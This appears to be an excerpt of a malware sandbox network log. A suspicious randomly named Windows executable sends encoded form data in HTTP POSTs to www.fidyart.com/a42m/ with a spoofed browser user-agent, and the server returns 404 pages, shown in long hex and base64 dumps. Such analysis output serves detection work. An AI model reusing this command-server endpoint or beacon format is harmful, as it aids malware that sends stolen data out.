                          Data Raw: 33 46 42 41 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 57 65 62 73 69 74 65 20 6e 6f 74 20 66 6f 75 6e 64 e2 80 a6 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 [TRUNCATED]
                          Data Ascii: 3FBA<!doctype html><html class="no-js" lang=""><head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <title>Website not found</title> <meta name="description" content=""> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <link rel="icon" type="image/png" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAEAAAABACAYAAACqaXHeAAAAAXNSR0IArs4c6QAACHhJREFUeAHdW2lsHEUWrqqZsT3j2FmbHBxBXsyGsAsCCRIRgjicA2JHRAtEQtHCj2i1ihASgnCEOFnEj9jhNAgpIC7xA6RoEYeIiB0WEgdLiYSSrATi2JBsIBAMPmIndjzjeDxV+73xtNUz7unpqukZj+gfrup6r973va+rq2q625wV+Ljw0KuRod5Ti5RSSxRnixRjczhjNYCtUUxRyTjjgygGYRuErZcrdpBzfqB6znkHuxeuj5JPoQ7g+X9ce+jV0H/7BtZIJe9nTF3HFAsaoXA2Dnm+EFxsv3x27XuHF66PG8Vx6eSrAH/sfKuiL9r9EK7k/bi6F7ngapswSn4B2e0X8Kq2Y00PnNMOkKWDbwJUdTy9ICHj/0LyV2fB8qUZhL8MiNDdw40bj/gRUPgRpLJ929/G1fjhQidPXAmDsAjTD+55j4BIR+tqJeWHIOOLmBpJSS7EHdHG5p0afaa45iVAZUfLVVKp/bgsM6ZELkYDZ2cF5zeMNG7+yhTO+KrNO9AWllLtnLbkKWMITxyIS9EFOHU6uh6gdabAPvarS3ExCml0C [TRUNCATED]
                          May 23, 2024 15:17:52.635495901 CEST224INData Raw: 62 69 4a 59 56 4e 52 6a 38 36 63 53 4a 75 75 6a 32 31 42 66 6a 70 35 32 50 58 41 53 53 69 43 31 51 45 2f 30 69 4b 6d 78 61 55 74 67 41 4a 79 57 37 55 51 69 69 69 73 77 6b 33 62 51 47 51 54 30 6e 4d 2f 46 6c 30 31 65 61 6d 4c 59 42 53 38 72 77 73
                          Data Ascii: biJYVNRj86cSJuuj21Bfjp52PXASSiC1QE/0iKmxaUtgAJyW7UQiiiswk3bQGQT0nM/Fl01eamLYBS8rws4NPebMJNWwCsubOmPdMsBEy4aQsA7JIdASbcTARIZLkApdCszU1fAMV6SyFTRw4G3PQFYKzPEbw0GrW5aQuAHZc2SLG0MeGmLQAeQJTsLWDCTVsAxaQvDyMLMSpMuGkLUB4KduFZvfZsW4
                          May 23, 2024 15:17:52.640237093 CEST1236INData Raw: 69 45 30 32 50 79 78 41 53 33 39 4e 5a 63 5a 39 6f 43 44 4b 35 34 2f 41 7a 6e 37 44 2b 35 41 68 66 62 54 70 79 49 6d 79 36 75 74 67 41 45 67 4d 6c 6d 72 79 35 51 6f 66 31 4e 4f 52 6b 4a 49 4a 67 6f 4f 51 46 4d 4f 52 6b 4a 73 43 69 38 65 43 2f 32
                          Data Ascii: iE02PyxAS39NZcZ9oCDK54/Azn7D+5AhfbTpyImy6utgAEgMlmry5Qof1NORkJIJgoOQFMORkJsCi8eC/23d2Fvqpe4xMX4uTV3+5nJMC+hga8tFRv2ANNb129McFJn4WRAASjWOj10lgNeGKCi37y1MNYgFjTxpN4pv6xGax/vYgDcTGNaCwAAeK9/UumwH71y5eD0YsRO/nwrq2f4/wme1sR612xVVtuzgdvcgRU726rrf73M
                          May 23, 2024 15:17:52.640373945 CEST1236INData Raw: 4b 2b 59 47 79 64 6d 30 2b 6d 6a 59 63 43 6b 77 4c 77 59 46 44 72 32 53 4a 75 77 58 57 45 6d 52 6e 54 35 44 78 76 41 5a 4a 66 61 73 76 45 36 39 34 6d 70 55 6d 4b 58 64 5a 47 68 46 70 53 39 61 35 4a 61 36 34 4b 2f 58 41 44 5a 6a 35 66 69 56 73 51
                          Data Ascii: K+YGydm0+mjYcCkwLwYFDr2SJuwXWEmRnT5DxvAZJfasvE694mpUmKXdZGhFpS9a5Ja64K/XADZj5fiVsQeQnwpFLi1GD0TVwRrX0D5+IFi4BVOrVZNqeSMAmbODjZvbYZT4K17S9Vj7LhtzHrr/YKlvTj/NjGxuYFT3Iu7f0okac7Wo9gJP3J3p6rjlVhZwWruneg6YGhXL5O9pwChPdsvUiM8QYlxHdC8VEm1VzJ5FIsgffR0
                          May 23, 2024 15:17:52.640383005 CEST1236INData Raw: 36 36 50 47 38 56 78 36 65 53 72 41 48 2f 73 66 4b 75 69 4c 39 72 39 45 4b 37 6b 2f 62 69 36 46 37 6e 67 61 70 73 77 53 6e 34 42 32 65 30 58 38 4b 71 32 59 30 30 50 6e 4e 4d 4f 6b 4b 57 44 62 77 4a 55 64 54 79 39 49 43 48 6a 2f 30 4c 79 56 32 66
                          Data Ascii: 66PG8Vx6eSrAH/sfKuiL9r9EK7k/bi6F7ngapswSn4B2e0X8Kq2Y00PnNMOkKWDbwJUdTy9ICHj/0LyV2fB8qUZhL8MiNDdw40bj/gRUPgRpLJ929/G1fjhQidPXAmDsAjTD+55j4BIR+tqJeWHIOOLmBpJSS7EHdHG5p0afaa45iVAZUfLVVKp/bgsM6ZELkYDZ2cF5zeMNG7+yhTO+KrNO9AWllLtnLbkKWMITxyIS9EFOHU6
                          May 23, 2024 15:17:52.640388966 CEST1236INData Raw: 75 4a 4d 6e 55 51 5a 42 4e 64 4c 77 66 56 4b 70 36 74 75 36 2f 73 44 6c 74 44 36 69 51 38 59 4f 58 73 66 7a 6f 2f 59 6a 4f 6c 56 75 69 57 59 57 6f 7a 47 78 51 44 41 67 62 4e 6b 57 52 70 2f 55 68 64 69 6d 63 58 4a 47 7a 76 2b 48 72 46 50 72 67 49
                          Data Ascii: uJMnUQZBNdLwfVKp6tu6/sDltD6iQ8YOXsfzo/YjOlVuiWYWozGxQDAgbNkWRp/UhdimcXJGzv+HrFPrgIBJt4qjX19sQTliUBZEDmnBMB6+i2UmPZtbbHSp1zPrtj43aQAVJkRLPsn7qWDxSIxXTiUI+Vq4ScnQeuE1sXxRHQv7qWCfu5q4RW7RLJfBgORpUMrNwxY2BM7wdQZGWprItdzwbdbDr+XknKi3OzJU25pI8CebKRj
                          May 23, 2024 15:17:52.645091057 CEST1236INData Raw: 76 4f 5a 38 2b 56 6f 66 43 31 58 61 69 6d 65 43 6c 38 4a 4d 57 5a 68 6a 69 68 48 2b 41 48 38 4d 75 76 48 72 38 45 6a 54 4b 67 39 77 55 44 5a 70 30 4f 33 50 75 62 58 4a 47 62 42 4a 30 74 36 72 7a 65 65 47 46 76 42 4a 46 38 47 7a 41 58 41 6e 49 55
                          Data Ascii: vOZ8+VofC1XaimeCl8JMWZhjihH+AH8MuvHr8EjTKg9wUDZp0O3PubXJGbBJ0t6rzeeGFvBJF8GzAXAnIU9IZZidQ5c+vFU+GvF+V5REdox0vDYb2mds5z8H75k4O/8/I4PAAAAAElFTkSuQmCC"> <link rel="icon" type="image/x-icon" href="data:image/x-icon;base64,AAABAAEAEBAAAAEAIABo
                          May 23, 2024 15:17:52.647674084 CEST1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 47 53 51 43 35 74 6f 6c 52 44 2f 5a 49 38 51 2f 32 53 50 45 50 39 6b 6a 78 44 2f 5a 49 38 51 2f 32 53 50 45 50 39 6b 6a 78 44 2f 5a 35 51 51 2f 32 4f 52 44 71 45 41 41 41 41
                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAGSQC5tolRD/ZI8Q/2SPEP9kjxD/ZI8Q/2SPEP9kjxD/Z5QQ/2ORDqEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABijwx3aJUQ/2SPEP9kjxD/ZI8Q/2SPEP9kjxD/ZI8Q/2iVEP9ljQ5+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAY4gAKWWRDe1mkxH/ZI8Q/2SPEP9kjxD/ZI8Q/2aTEf9mkg7w
                          May 23, 2024 15:17:52.647680044 CEST1236INData Raw: 39 64 31 4f 6c 6f 59 42 67 2b 59 44 57 2b 2b 66 58 50 74 34 6b 6b 4e 6f 5a 71 6f 61 79 44 4b 67 6a 46 73 50 52 72 4b 79 6a 69 74 50 76 76 7a 54 73 78 2f 50 62 35 2b 5a 39 30 55 64 6f 6c 68 54 39 32 53 53 79 47 4a 65 79 64 42 49 4c 4b 72 36 2f 59
                          Data Ascii: 9d1OloYBg+YDW++fXPt4kkNoZqoayDKgjFsPRrKyjitPvvzTsx/Pb5+Z90UdolhT92SSyGJeydBILKr6/Ynf5nt394lPiJSIiAErLGRRZq+SGVHLCtbR8Hj94j6SWdGzzuQy7uwrGwC3FWqRmiNQVBw4QEVBREBkK1NAxpSp4iYnOXauXWra0uo6G/OsbFypbfs/ya5rzHHl2TSn0uX3t03puNetve3hGHLdU8727v8v5rGxeXb
                          May 23, 2024 15:17:52.651210070 CEST1236INData Raw: 57 71 2b 47 6d 6b 30 68 79 69 47 6d 6f 6e 50 6c 57 68 71 50 59 2b 58 53 4c 6a 71 58 4c 73 71 63 79 39 4a 46 34 36 4a 79 55 62 72 6f 55 32 7a 72 35 65 48 2f 31 2b 70 66 32 33 76 31 71 68 2f 41 6a 6f 72 38 56 7a 35 5a 77 67 31 38 55 44 35 43 31 64
                          Data Ascii: Wq+Gmk0hyiGmonPlWhqPY+XSLjqXLsqcy9JF46JyUbroU2zr5eH/1+pf23v1qh/Ajor8Vz5Zwg18UD5C1dzpeS9navVHVenVAb6/Q50J1ZpPAx/YAvkQ6sqEJoiK0fkYD6wAjY+RkdERUkaYEP96xj/QET4AXJrFmyXzYlORiY9wsJQH/u9VznkUe8+u6AdL0o2YMbZgqTYnTqCecklq2HuX9lLrnNYeb4VfAPqtoDB2Hq12bK/
                          May 23, 2024 15:17:52.651217937 CEST1236INData Raw: 73 77 6e 51 39 70 44 76 71 51 42 6f 78 62 50 4b 66 52 65 2b 66 67 30 46 50 41 63 75 4e 31 42 58 69 4e 6b 49 4b 67 56 4e 68 64 4c 41 70 47 4e 78 74 47 58 6c 6b 51 77 6e 65 78 67 68 59 38 33 6a 72 44 65 6d 39 75 39 57 6b 51 46 4a 70 6a 50 56 38 72
                          Data Ascii: swnQ9pDvqQBoxbPKfRe+fg0FPAcuN1BXiNkIKgVNhdLApGNxtGXlkQwnexghY83jrDem9u9WkQFJpjPV8rEBjqBRGH04c3gu0hnkT6GYoWbQHPRevxXTydKF7ugZ052ituN/bP2wAcQg1RDFQx6hypg2kYz3v9fpHgf0TFShhoaWLtlY7BycXPlThEe8fOGXgKk0jZgxa66Ea4vMIppi4hKSUpGWjKycvIL1tFHblh17X5wvUXv


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          14192.168.2.55366763.250.43.147807116C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe
                          TimestampBytes transferredDirectionData
                          May 23, 2024 15:17:54.544348955 CEST761OUTPOST /a42m/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                          Accept-Language: en-US,en
                          Accept-Encoding: gzip, deflate, br
                          Host: www.fidyart.com
                          Origin: http://www.fidyart.com
                          Content-Type: application/x-www-form-urlencoded
                          Cache-Control: max-age=0
                          Content-Length: 224
                          Connection: close
                          Referer: http://www.fidyart.com/a42m/
                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          Data Raw: 76 48 35 3d 65 54 79 59 34 62 2b 54 6a 43 63 6b 37 57 56 31 78 2f 71 43 63 4a 75 33 31 37 71 4a 61 41 66 67 47 73 32 59 30 33 6b 4d 57 6e 78 7a 36 4c 6d 39 45 64 46 6b 77 35 46 69 77 53 7a 74 72 32 38 76 6a 6c 7a 68 4f 43 51 6e 4c 4b 2b 37 43 44 32 35 68 42 4b 4f 72 45 54 6c 70 59 33 4c 43 54 6c 56 69 37 6d 5a 35 4d 35 78 78 49 7a 35 66 39 73 31 56 52 61 4b 35 62 69 75 4e 79 75 36 46 36 70 2b 44 79 35 4b 36 75 36 33 74 36 6c 44 41 72 48 39 75 64 67 77 74 6c 39 70 48 53 48 68 79 58 79 67 33 56 4d 62 51 6c 78 71 75 69 46 51 76 32 6d 43 54 61 79 30 76 33 4e 7a 33 6b 55 34 32 78 4b 50 71 70 4d 2f 55 74 72 4d 70 38 57 50 4b 72 52 66 4c 44 6d 2f 52 4a 72 66 4f 36 32 37
                          Data Ascii: vH5=eTyY4b+TjCck7WV1x/qCcJu317qJaAfgGs2Y03kMWnxz6Lm9EdFkw5FiwSztr28vjlzhOCQnLK+7CD25hBKOrETlpY3LCTlVi7mZ5M5xxIz5f9s1VRaK5biuNyu6F6p+Dy5K6u63t6lDArH9udgwtl9pHSHhyXyg3VMbQlxquiFQv2mCTay0v3Nz3kU42xKPqpM/UtrMp8WPKrRfLDm/RJrfO627
                          May 23, 2024 15:17:55.128134966 CEST1236INHTTP/1.1 404 Not Found
                          content-type: text/html
                          date: Thu, 23 May 2024 13:17:55 GMT
                          transfer-encoding: chunked
                          connection: close
                          Data Raw: 46 46 41 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 57 65 62 73 69 74 65 20 6e 6f 74 20 66 6f 75 6e 64 e2 80 a6 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 [TRUNCATED]
                          Data Ascii: FFA<!doctype html><html class="no-js" lang=""><head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <title>Website not found</title> <meta name="description" content=""> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <link rel="icon" type="image/png" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAEAAAABACAYAAACqaXHeAAAAAXNSR0IArs4c6QAACHhJREFUeAHdW2lsHEUWrqqZsT3j2FmbHBxBXsyGsAsCCRIRgjicA2JHRAtEQtHCj2i1ihASgnCEOFnEj9jhNAgpIC7xA6RoEYeIiB0WEgdLiYSSrATi2JBsIBAMPmIndjzjeDxV+73xtNUz7unpqukZj+gfrup6r973va+rq2q625wV+Ljw0KuRod5Ti5RSSxRnixRjczhjNYCtUUxRyTjjgygGYRuErZcrdpBzfqB6znkHuxeuj5JPoQ7g+X9ce+jV0H/7BtZIJe9nTF3HFAsaoXA2Dnm+EFxsv3x27XuHF66PG8Vx6eSrAH/sfKuiL9r9EK7k/bi6F7ngapswSn4B2e0X8Kq2Y00PnNMOkKWDbwJUdTy9ICHj/0LyV2fB8qUZhL8MiNDdw40bj/gRUPgRpLJ929/G1fjhQidPXAmDsAjTD+55j4BIR+tqJeWHIOOLmBpJSS7EHdHG5p0afaa45iVAZUfLVVKp/bgsM6ZELkYDZ2cF5zeMNG7+yhTO+KrNO9AWllLtnLbkKWMITxyIS9EFOHU6uh6gdabAPvarS3ExCml0C9 [TRUNCATED]
                          May 23, 2024 15:17:55.128349066 CEST1236INData Raw: 69 4a 59 56 4e 52 6a 38 36 63 53 4a 75 75 6a 32 31 42 66 6a 70 35 32 50 58 41 53 53 69 43 31 51 45 2f 30 69 4b 6d 78 61 55 74 67 41 4a 79 57 37 55 51 69 69 69 73 77 6b 33 62 51 47 51 54 30 6e 4d 2f 46 6c 30 31 65 61 6d 4c 59 42 53 38 72 77 73 34
                          Data Ascii: iJYVNRj86cSJuuj21Bfjp52PXASSiC1QE/0iKmxaUtgAJyW7UQiiiswk3bQGQT0nM/Fl01eamLYBS8rws4NPebMJNWwCsubOmPdMsBEy4aQsA7JIdASbcTARIZLkApdCszU1fAMV6SyFTRw4G3PQFYKzPEbw0GrW5aQuAHZc2SLG0MeGmLQAeQJTsLWDCTVsAxaQvDyMLMSpMuGkLUB4KduFZvfZsW4iE02PyxAS39NZcZ9oCDK
                          May 23, 2024 15:17:55.128930092 CEST1236INData Raw: 47 59 32 67 4d 49 39 55 4c 67 58 34 57 67 75 31 44 75 55 63 79 39 51 6f 45 75 4d 76 71 36 31 70 79 48 67 2b 4a 38 50 6e 6b 45 35 66 52 48 73 54 31 39 44 38 46 45 4f 42 39 77 66 68 39 53 47 7a 5a 42 43 64 31 4d 61 37 6a 48 4b 56 59 4c 5a 49 5a 41
                          Data Ascii: GY2gMI9ULgX4Wgu1DuUcy9QoEuMvq61pyHg+J8PnkE5fRHsT19D8FEOB9wfh9SGzZBCd1Ma7jHKVYLZIZAsc+xDpOnLDj7xxZvrnHjUdOAdw6220zP9tWP3YucRRtabeV3Setztm+WNOWBmoLt2/tBOlb0uzZT2RZeWD+meWbaPOW9+GNrAeY+JjcDDfP8fAYe5cVFu/02q26h1KksDy45nbxTNgtVHK+YGydm0+mjYcCkwLwYF
                          May 23, 2024 15:17:55.129550934 CEST1236INData Raw: 6e 45 6a 39 6a 68 4e 41 67 70 49 43 37 78 41 36 52 6f 45 59 65 49 69 42 30 57 45 67 64 4c 69 59 53 53 72 41 54 69 32 4a 42 73 49 42 41 4d 50 6d 49 6e 64 6a 7a 6a 65 44 78 56 2b 37 33 78 74 4e 55 7a 37 75 6e 70 71 75 6b 5a 6a 2b 67 66 72 75 70 36
                          Data Ascii: nEj9jhNAgpIC7xA6RoEYeIiB0WEgdLiYSSrATi2JBsIBAMPmIndjzjeDxV+73xtNUz7unpqukZj+gfrup6r973va+rq2q625wV+Ljw0KuRod5Ti5RSSxRnixRjczhjNYCtUUxRyTjjgygGYRuErZcrdpBzfqB6znkHuxeuj5JPoQ7g+X9ce+jV0H/7BtZIJe9nTF3HFAsaoXA2Dnm+EFxsv3x27XuHF66PG8Vx6eSrAH/sfKuiL
                          May 23, 2024 15:17:55.129564047 CEST1236INData Raw: 49 35 5a 65 44 58 55 65 35 43 68 47 52 56 68 6f 45 57 2b 52 6c 51 71 7a 4f 79 75 2b 57 61 4b 62 61 4d 68 71 70 64 72 5a 66 42 2f 37 57 4d 35 73 4b 66 41 6a 4f 4a 6e 51 4f 4a 63 71 42 63 4b 4b 64 4d 56 38 71 64 30 2f 75 30 34 79 65 4f 6a 6d 4c 73
                          Data Ascii: I5ZeDXUe5ChGRVhoEW+RlQqzOyu+WaKbaMhqpdrZfB/7WM5sKfAjOJnQOJcqBcKKdMV8qd0/u04yeOjmLsO6wIfJgL9nx5MPBi5i8t+ihh4HRsLYK2AWBmZvBinGMLTL/+NtT+Ibzj5JINMTtmzadPzTw3nnhQSfYwrujUi8y5qq+bX5FMGkvZcXS+xB4grY5PUfCZ2tf49O1/6DCuGJ+HcuF0JZ7GDSckBH4NHuJMnUQZBNdLw
                          May 23, 2024 15:17:55.130748987 CEST1236INData Raw: 68 50 75 38 74 46 34 4e 62 68 35 63 32 6e 63 73 55 6a 48 2f 4b 6c 50 72 6c 38 50 64 6d 56 64 4d 33 42 56 51 41 59 39 2b 4e 35 45 79 62 63 76 49 36 6a 32 4c 71 75 4f 4e 32 34 36 55 65 76 55 63 69 58 2b 67 44 37 6d 4e 63 2b 6a 6e 37 67 4c 69 51 2f
                          Data Ascii: hPu8tF4Nbh5c2ncsUjH/KlPrl8PdmVdM3BVQAY9+N5EybcvI6j2LquON246UevUciX+gD7mNc+jn7gLiQ/4GhLNboKMLyq+Xuh2ItuAXLYdlTODF1LD1xy+E0xU5/K6uA1MOyYYvTYQNwpBzf3nKsAljle2dHajBkfW13l6d/TMHw/wWzfeva2x7vcwL3aZnzy1E1YHcBB3eatD49hZWgZaWxuBRfXEZxTAAuwsvOZ8+VofC1Xa
                          May 23, 2024 15:17:55.131393909 CEST1236INData Raw: 32 4f 42 44 52 6b 6b 41 37 33 5a 4a 41 50 2f 32 53 50 45 50 39 6b 6a 78 44 2f 5a 49 38 51 2f 32 53 50 45 50 39 6b 6a 78 44 2f 5a 5a 45 4f 2b 57 4b 4b 44 54 6b 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                          Data Ascii: 2OBDRkkA73ZJAP/2SPEP9kjxD/ZI8Q/2SPEP9kjxD/ZZEO+WKKDTkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABijg90aJUQ/2SPEP9kjxD/ZI8Q/2SPEP9kjxD/ZI8Q/2iVEP9ikAh6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAZJELmGiVEP9kjxD/ZI8Q/2SPEP9kjxD/ZI8Q/2SPEP9nlBH/Y5EOnwAAAAAAAAAAAAAAAAAAA
                          May 23, 2024 15:17:55.131408930 CEST1236INData Raw: 55 67 54 63 2f 57 43 69 4d 4d 77 54 30 4c 33 43 52 2f 53 50 36 46 44 65 79 4b 4b 6d 61 79 47 47 33 6d 66 31 6b 6a 63 6b 59 67 56 36 6c 39 63 75 30 65 71 50 50 55 51 61 5a 4e 33 48 42 74 66 52 51 35 6c 46 43 2f 32 58 63 53 75 44 2f 77 6f 48 71 67
                          Data Ascii: UgTc/WCiMMwT0L3CR/SP6FDeyKKmayGG3mf1kjckYgV6l9cu0eqPPUQaZN3HBtfRQ5lFC/2XcSuD/woHqgGX6gqVVq1MXPqjVdyX5G9MMu0BDTEk8QnTSHu80fpFMM7xulyXPi5UhtRRQzGOrg0cdmkrPaXqS6dz3qHyuv1C5VR6jzApauYMfw9EUUS2k/LdHwD9mAf+FZcQuU/slhoN/xvxGBQudlmKhWbkQR/9d1OloYBg+YD
                          May 23, 2024 15:17:55.133330107 CEST1236INData Raw: 48 49 71 33 33 31 38 66 67 72 6a 2f 33 2f 6c 66 48 2f 76 66 63 36 35 39 31 59 6a 51 46 43 6c 6f 70 47 51 5a 58 41 58 4f 33 6d 38 39 42 32 34 30 6a 67 54 4c 30 5a 36 55 6f 4a 6c 5a 64 62 39 50 32 61 43 52 34 46 73 54 70 37 6e 54 55 61 39 4c 61 79
                          Data Ascii: HIq3318fgrj/3/lfH/vfc6591YjQFClopGQZXAXO3m89B240jgTL0Z6UoJlZdb9P2aCR4FsTp7nTUa9LaymSp9NvB6DR1R94yNBgEWSVV3aT2Kn+mobNmkZ7v/3Vcv2P3yAhDQza2E0exScxD1HPuJGybElIDoF7eaicUrVx33v/Yf/Hz4A/g9CJD5JUYQSwQkkIGpEUDsD4H9AHwClJSntrNLmJKfdTBJDzYw0Wq+Gmk0hyiGm
                          May 23, 2024 15:17:55.133457899 CEST1236INData Raw: 4b 57 66 2f 6a 78 72 2f 52 41 69 6f 6d 75 2b 74 4f 68 38 50 62 76 45 77 7a 38 4d 2f 35 65 63 53 54 45 5a 49 55 49 2f 38 34 76 73 72 31 77 43 59 45 43 66 76 2f 48 76 6b 6b 63 44 42 47 56 39 34 30 76 41 53 37 35 32 2f 66 70 37 44 79 50 74 38 36 42
                          Data Ascii: KWf/jxr/RAiomu+tOh8PbvEwz8M/5ecSTEZIUI/84vsr1wCYECfv/HvkkcDBGV940vAS752/fp7DyPt86B3rPuOmXM+Mjsa/6vQclsQ317HRTeT/exiy2Krk9EpzanE1dYV4coCTYMdwXngIvBd8GPwVzdvN7Pb9QWz7iT3wQWzC2bBXyGI50TCIVgIDyKD6CEmSA7EAimD1Fwa9uic/DzYC1kD2QAZhiD0cwIEswnQ9pDvqQBo
                          May 23, 2024 15:17:55.134907007 CEST1236INData Raw: 6f 50 4a 59 6e 4f 34 50 49 46 51 4a 42 34 6c 4a 79 70 46 55 6a 47 6b 6d 4a 38 71 71 78 6c 7a 46 55 56 4a 59 7a 51 71 50 55 4e 4e 5a 48 49 2b 53 67 4c 62 67 37 64 45 45 57 33 41 6b 77 43 72 59 33 4f 32 77 48 66 6d 2b 62 6d 42 77 36 4b 6f 76 74 6c
                          Data Ascii: oPJYnO4PIFQJB4lJypFUjGkmJ8qqxlzFUVJYzQqPUNNZHI+SgLbg7dEEW3AkwCrY3O2wHfm+bmBw6Kovtly2jcoF6VyUXhBNU6SRfCRKFRDc7dTVl09hMEIcZCQkpFTFFDDzztpiWJlFFxpn1sOF+kV0WtvvPXOex9GH08AQVpAhPrrh5EZ4vMN4x4L6INElCWpzgF1B8wM3B0I6wA9GAKOq95YA6rRWLNVRE0kCTJ1ijVUCdrw


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          15192.168.2.55366863.250.43.147807116C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe
                          TimestampBytes transferredDirectionData
                          May 23, 2024 15:17:57.073312044 CEST1778OUTPOST /a42m/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                          Accept-Language: en-US,en
                          Accept-Encoding: gzip, deflate, br
                          Host: www.fidyart.com
                          Origin: http://www.fidyart.com
                          Content-Type: application/x-www-form-urlencoded
                          Cache-Control: max-age=0
                          Content-Length: 1240
                          Connection: close
                          Referer: http://www.fidyart.com/a42m/
                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          Data Raw: 76 48 35 3d 65 54 79 59 34 62 2b 54 6a 43 63 6b 37 57 56 31 78 2f 71 43 63 4a 75 33 31 37 71 4a 61 41 66 67 47 73 32 59 30 33 6b 4d 57 6e 35 7a 36 36 47 39 46 38 46 6b 68 4a 46 69 75 69 7a 6f 72 32 38 79 6a 6c 36 6f 4f 43 63 33 4c 49 32 37 45 68 4f 35 32 67 4b 4f 67 45 54 6c 6c 34 33 4f 4e 7a 6b 49 69 37 33 51 35 4e 4a 78 78 49 7a 35 66 2b 30 31 44 51 61 4b 70 72 69 70 45 53 75 6d 55 71 70 61 44 79 67 2f 36 75 33 41 75 4c 46 44 46 36 33 39 73 4a 41 77 77 31 39 76 58 43 48 35 79 57 50 34 33 56 52 6b 51 6c 45 50 75 69 39 51 72 67 32 56 43 65 71 32 7a 6b 70 54 30 30 30 56 30 6b 79 2f 71 70 6f 62 52 2b 43 73 30 4d 48 73 41 37 56 68 47 6e 36 77 4f 74 4c 38 44 64 32 33 31 70 47 44 63 78 33 6c 75 61 2f 66 65 4f 69 76 6c 4a 56 64 79 4c 59 30 73 37 42 63 46 6c 6d 42 65 74 69 57 5a 51 44 34 68 6d 54 43 4b 57 70 58 70 32 45 47 65 30 35 34 4f 59 52 55 6d 47 66 45 72 32 5a 7a 6f 57 2b 4e 52 53 46 31 33 33 67 74 76 4a 6a 43 7a 54 53 34 6e 52 34 38 59 4c 35 50 53 63 59 66 46 4c 47 5a 54 51 67 64 78 2b 50 6f 69 6b [TRUNCATED]
